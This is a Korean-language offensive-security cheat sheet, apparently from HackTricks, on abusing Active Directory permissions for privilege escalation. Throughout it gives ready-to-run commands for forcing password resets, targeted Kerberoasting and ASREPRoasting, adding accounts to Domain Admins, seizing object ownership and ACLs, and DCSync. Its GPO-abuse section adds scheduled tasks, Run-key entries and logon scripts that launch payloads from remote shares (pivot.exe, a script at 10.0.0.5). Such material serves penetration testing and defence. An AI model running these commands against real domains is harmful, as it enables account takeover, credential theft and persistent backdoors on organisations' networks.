Abusing Active Directory ACLs/ACEs

htARTE (HackTricks AWS Red Team Expert)를 통해 **제로부터 영웅까지 AWS 해킹 배우기**!

HackTricks를 지원하는 다른 방법:

이 페이지는 대부분 https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges의 기술 요약입니다. 자세한 내용은 원본 기사를 확인하세요.

사용자에 대한 GenericAll 권한

이 권한은 공격자에게 대상 사용자 계정에 대한 완전한 제어를 부여합니다. GenericAll 권한이 Get-ObjectAcl 명령을 사용하여 확인되면 공격자는 다음을 수행할 수 있습니다:

  • 대상의 암호 변경: net user <username> <password> /domain을 사용하여 공격자는 사용자의 암호를 재설정할 수 있습니다.

  • 대상화된 Kerberoasting: 사용자 계정에 SPN을 할당하여 kerberoastable하게 만든 다음 Rubeus 및 targetedKerberoast.py를 사용하여 ticket-granting ticket (TGT) 해시를 추출하고 시도하여 균열을 낼 수 있습니다.

Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
.\Rubeus.exe kerberoast /user:<username> /nowrap
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose
  • 대상 ASREPRoasting: 사용자의 사전 인증을 비활성화하여 계정을 ASREPRoasting에 취약하게 만듭니다.

Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}

그룹에 대한 일반 모든 권한

이 권한을 가진 공격자는 Domain Admins와 같은 그룹에 대한 GenericAll 권한이 있다면 그룹 멤버십을 조작할 수 있습니다. Get-NetGroup을 사용하여 그룹의 식별 이름을 식별한 후, 공격자는 다음을 수행할 수 있습니다:

  • 자신을 도메인 관리자 그룹에 추가: 이는 직접 명령을 사용하거나 Active Directory 또는 PowerSploit와 같은 모듈을 사용하여 수행할 수 있습니다.

net group "domain admins" spotless /add /domain
Add-ADGroupMember -Identity "domain admins" -Members spotless
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"

GenericAll / GenericWrite / Write on Computer/User

컴퓨터 객체 또는 사용자 계정에서 이러한 권한을 보유하면 다음을 수행할 수 있습니다:

  • Kerberos Resource-based Constrained Delegation: 컴퓨터 객체를 인수하는 데 사용됩니다.

  • Shadow Credentials: 이 기술을 사용하여 그림자 자격 증명을 생성하여 컴퓨터 또는 사용자 계정을 흉내 낼 수 있습니다.

WriteProperty on Group

특정 그룹 (예: Domain Admins)에 대해 모든 객체에 대한 WriteProperty 권한이 있는 사용자는 다음을 수행할 수 있습니다:

  • 도메인 관리자 그룹에 자신 추가: net userAdd-NetGroupUser 명령을 결합하여 이 방법을 통해 도메인 내에서 권한 상승이 가능합니다.

net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain

그룹에서의 자체 (자체 멤버십)

이 권한을 사용하면 공격자가 Domain Admins와 같은 특정 그룹에 직접 그룹 멤버십을 조작하는 명령을 사용하여 자신을 추가할 수 있습니다. 다음 명령 시퀀스를 사용하면 자체 추가가 가능합니다:

net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain

WriteProperty (자체 멤버십)

이와 유사한 권한으로, 공격자가 해당 그룹에 대해 WriteProperty 권한이 있는 경우 그룹 속성을 수정하여 직접 그룹에 자신을 추가할 수 있습니다. 이 권한의 확인 및 실행은 다음과 같이 수행됩니다:

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
net group "domain admins" spotless /add /domain

ForceChangePassword

사용자에 대한 User-Force-Change-PasswordExtendedRight를 보유하면 현재 암호를 알지 못해도 암호를 재설정할 수 있습니다. 이 권한의 확인 및 악용은 PowerShell이나 대체 명령줄 도구를 통해 수행할 수 있으며, 상호 작용 세션 및 비대화식 환경에 대한 원 라이너를 포함한 여러 방법을 제공하여 사용자의 암호를 재설정할 수 있습니다. 명령어는 간단한 PowerShell 호출부터 Linux의 rpcclient를 사용하는 것까지 다양한 공격 벡터의 다양성을 보여줍니다.

Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
Set-DomainUserPassword -Identity delegate -Verbose
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
rpcclient -U KnownUsername 10.10.10.192
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'

그룹에 WriteOwner 설정

만약 공격자가 특정 그룹에 WriteOwner 권한을 가지고 있다는 것을 발견하면, 그룹의 소유권을 자신으로 변경할 수 있습니다. 특히 그룹이 Domain Admins인 경우, 소유권을 변경하면 그룹 속성 및 구성원에 대한 보다 넓은 제어가 가능해집니다. 이 과정은 Get-ObjectAcl을 통해 올바른 객체를 식별한 다음, Set-DomainObjectOwner를 사용하여 소유자를 SID 또는 이름으로 수정하는 것을 포함합니다.

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico

사용자에 대한 GenericWrite

이 권한을 통해 공격자는 사용자 속성을 수정할 수 있습니다. 구체적으로 GenericWrite 액세스를 통해 공격자는 사용자 로그온 시 악성 스크립트를 실행하기 위해 사용자의 로그온 스크립트 경로를 변경할 수 있습니다. 이는 Set-ADObject 명령을 사용하여 대상 사용자의 scriptpath 속성을 공격자의 스크립트를 가리키도록 업데이트함으로써 달성됩니다.

Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"

그룹에서의 GenericWrite

이 권한을 사용하면 공격자가 그룹 멤버십을 조작할 수 있습니다. 예를 들어 특정 그룹에 자신이나 다른 사용자를 추가하는 것과 같은 작업이 가능합니다. 이 과정은 자격 증명 객체를 생성하고, 해당 객체를 사용하여 그룹에서 사용자를 추가하거나 제거한 후 PowerShell 명령을 사용하여 멤버십 변경을 확인하는 과정을 포함합니다.

$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose
Get-DomainGroupMember -Identity "Group Name" | Select MemberName
Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose

WriteDACL + WriteOwner

AD 객체를 소유하고 해당 객체에 WriteDACL 권한이 있는 경우, 공격자는 해당 객체에 대한 GenericAll 권한을 부여할 수 있습니다. 이는 ADSI 조작을 통해 수행되며, 객체에 대한 완전한 제어와 그룹 멤버십 수정 기능을 제공합니다. 그러나 Active Directory 모듈의 Set-Acl / Get-Acl cmdlet을 사용하여 이러한 권한을 악용하려는 경우 제한 사항이 존재합니다.

$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
$IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference,"GenericAll","Allow"
$ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)
$ADSI.psbase.commitchanges()

도메인에서의 복제 (DCSync)

DCSync 공격은 도메인에서 특정 복제 권한을 활용하여 도메인 컨트롤러를 흉내내고 사용자 자격 증명을 포함한 데이터를 동기화하는 공격입니다. 이 강력한 기술은 DS-Replication-Get-Changes와 같은 권한이 필요하며, 공격자는 도메인 컨트롤러에 직접 액세스하지 않고도 AD 환경에서 민감한 정보를 추출할 수 있습니다. DCSync 공격에 대해 더 알아보기

GPO 위임

GPO 위임

그룹 정책 개체(GPOs)를 관리하기 위해 위임된 액세스는 중요한 보안 위험을 초래할 수 있습니다. 예를 들어, offense\spotless와 같은 사용자가 GPO 관리 권한을 위임받으면 WriteProperty, WriteDacl, WriteOwner와 같은 권한을 가질 수 있습니다. 이러한 권한은 PowerView를 사용하여 악용될 수 있습니다: bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}

GPO 권한 열람

구성이 잘못된 GPO를 식별하기 위해 PowerSploit의 cmdlet을 연결할 수 있습니다. 이를 통해 특정 사용자가 관리 권한을 가진 GPO를 발견할 수 있습니다: powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}

특정 정책이 적용된 컴퓨터: 특정 GPO가 적용된 컴퓨터를 확인하여 잠재적인 영향 범위를 이해하는 데 도움이 됩니다. powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}

특정 컴퓨터에 적용된 정책: 특정 컴퓨터에 적용된 정책을 확인하려면 Get-DomainGPO와 같은 명령을 활용할 수 있습니다.

특정 정책이 적용된 OU: 특정 정책에 영향을 받는 조직 단위(OU)를 식별하려면 Get-DomainOU를 사용할 수 있습니다.

GPO 악용 - New-GPOImmediateTask

구성이 잘못된 GPO는 예를 들어 즉시 예약된 작업을 생성하여 코드를 실행하는 데 악용될 수 있습니다. 이를 통해 영향을 받는 기기의 로컬 관리자 그룹에 사용자를 추가하여 권한을 크게 상승시킬 수 있습니다:

New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force

GroupPolicy 모듈 - GPO 남용

만약 설치되어 있다면 GroupPolicy 모듈은 새로운 GPO를 생성하고 연결하며, 레지스트리 값을 설정하여 영향을 받는 컴퓨터에 백도어를 실행할 수 있게 합니다. 이 방법은 GPO가 업데이트되어야 하며, 실행을 위해 사용자가 컴퓨터에 로그인해야 합니다:

New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString

SharpGPOAbuse - GPO 남용

SharpGPOAbuse는 기존 GPO를 남용하기 위한 방법을 제공하며 새로운 GPO를 생성할 필요 없이 작업을 추가하거나 설정을 수정할 수 있습니다. 이 도구는 변경 사항을 적용하기 전에 기존 GPO를 수정하거나 RSAT 도구를 사용하여 새로운 GPO를 생성해야 합니다:

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging"

정책 강제 업데이트

일반적으로 GPO 업데이트는 대략 90분마다 발생합니다. 특히 변경 사항을 적용한 후에는 대상 컴퓨터에서 gpupdate /force 명령을 사용하여 즉시 정책 업데이트를 강제할 수 있습니다. 이 명령은 GPO에 대한 수정 사항이 자동 업데이트 주기를 기다리지 않고 즉시 적용되도록 보장합니다.

내부 작동

특정 GPO에 대한 예약된 작업을 검사하면 Misconfigured Policy와 같은 작업에 evilTask와 같은 작업이 추가되었는지 확인할 수 있습니다. 이러한 작업은 시스템 동작을 수정하거나 권한을 상승시키기 위해 스크립트나 명령줄 도구를 통해 생성됩니다.

New-GPOImmediateTask에 의해 생성된 XML 구성 파일에서 작업의 구조는 예약된 작업의 세부 정보를 개요합니다. 이 파일은 예약된 작업이 GPO 내에서 어떻게 정의되고 관리되는지를 나타내며 임의의 명령이나 스크립트를 정책 강제의 일부로 실행하는 방법을 제공합니다.

사용자 및 그룹

GPO는 대상 시스템에서 사용자 및 그룹 멤버십을 조작할 수 있도록 합니다. 사용자 및 그룹 정책 파일을 직접 편집함으로써 공격자는 특권 그룹(예: 로컬 administrators 그룹)에 사용자를 추가할 수 있습니다. 이는 GPO 관리 권한 위임을 통해 가능하며, 이를 통해 정책 파일을 수정하여 새 사용자를 추가하거나 그룹 멤버십을 변경할 수 있습니다.

사용자 및 그룹에 대한 XML 구성 파일은 이러한 변경 사항이 어떻게 구현되는지를 개요합니다. 이 파일에 항목을 추가함으로써 특정 사용자가 영향을 받는 시스템 전체에서 특권을 부여받을 수 있습니다. 이 방법은 GPO 조작을 통해 특권 상승에 대한 직접적인 접근 방법을 제공합니다.

또한, 코드 실행이나 지속성 유지를 위한 추가 방법으로 로그온/로그오프 스크립트를 활용하거나 autoruns를 위한 레지스트리 키 수정, .msi 파일을 통한 소프트웨어 설치, 서비스 구성 편집 등도 고려할 수 있습니다. 이러한 기술은 GPO 남용을 통해 액세스 유지 및 대상 시스템 제어를 위한 다양한 경로를 제공합니다.

참고 자료

Last updated